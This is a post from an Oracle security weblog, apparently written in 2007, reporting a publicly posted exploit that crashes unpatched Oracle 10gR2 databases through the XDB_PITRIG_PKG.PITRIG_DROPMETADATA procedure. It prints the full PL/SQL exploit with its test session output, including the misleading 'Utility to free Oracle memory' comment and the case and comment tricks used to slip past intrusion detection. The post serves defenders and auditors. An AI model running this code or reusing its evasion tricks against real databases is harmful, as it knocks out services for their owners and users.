Call: +44 (0)1904 557620 Call
Blog

Pete Finnigan's Oracle Security Weblog

This is the weblog for Pete Finnigan. Pete works in the area of Oracle security and he specialises in auditing Oracle databases for security issues. This weblog is aimed squarely at those interested in the security of their Oracle databases.

[Previous entry: "Pete Finnigan speaking about Oracle 11g Security tomorrow at UKOUG DBMS SIG"] [Next entry: "Pete Finnigan Oracle 11g Security presentation slides available"]

Exploit code to crash an Oracle database posted



Last Friday someone calling themselves oraclefun at hushmail dot com posted an exploit for Oracle database using the package XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA. No versions were given as to which are vulnerable but Alex posted in his blog that unpatched 10.2.0.1 and 10.2.0.2 systems are affected and crash. I tested this on an unpatched 10.2.0.1 database:


SQL> grant create session to x identified by x;

Grant succeeded.

SQL> connect x/x
Connected.
SQL> edit
Wrote file afiedt.buf

1 -- Utility to free Oracle memory
2 declare
3 larry varchar2(32767);
4 mary varchar2(32767);
5 begin
6 larry:='larryellison';
7 larry:=larry||larry;
8 larry:=larry||larry;
9 larry:=larry||larry;
10 larry:=larry||larry;
11 larry:=larry||larry;
12 larry:=larry||larry;
13 larry:=larry||larry;
14 mary:='maryann';
15 mary:=mary||mary;
16 mary:=mary||mary;
17 mary:=mary||mary;
18 mary:=mary||mary;
19 mary:=mary||mary;
20 mary:=mary||mary;
21 mary:=mary||mary;
22 mary:=mary||mary;
23 xDb
24 /*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary
25 , larry);
26* end;
SQL> /
declare
*
ERROR at line 2:
ORA-03135: connection lost contact


SQL> connect system/manager
ERROR:
ORA-12514: TNS:listener does not currently know of service requested in connect
descriptor


SQL> connect system/manager
Connected.
SQL>


As you can see running this Oracle exploit code causes the connection to the database to be lost. This in fact has crashed the database. I had to restart the database:

Oracle 10gR2 exploit for XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA

The interesting thing with this exploit is that it uses some IDS evasion techniques. It uses case changes and also embedded comments to throw off IDS and IPS software that use simple rules to detect this type of attack.

There has been 1 Comment posted on this article


November 8th, 2007 at 08:13 pm

Pete Finnigan says:

Tried this on 10.2.0.2 on Tru64 both with and without CPUOct2007. Both versions had the following error, but neither database crashed.

exception system: exiting due to multiple internal errors:
exception dispatch or unwind stuck in infinite loop
exception dispatch or unwind stuck in infinite loop
declare
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel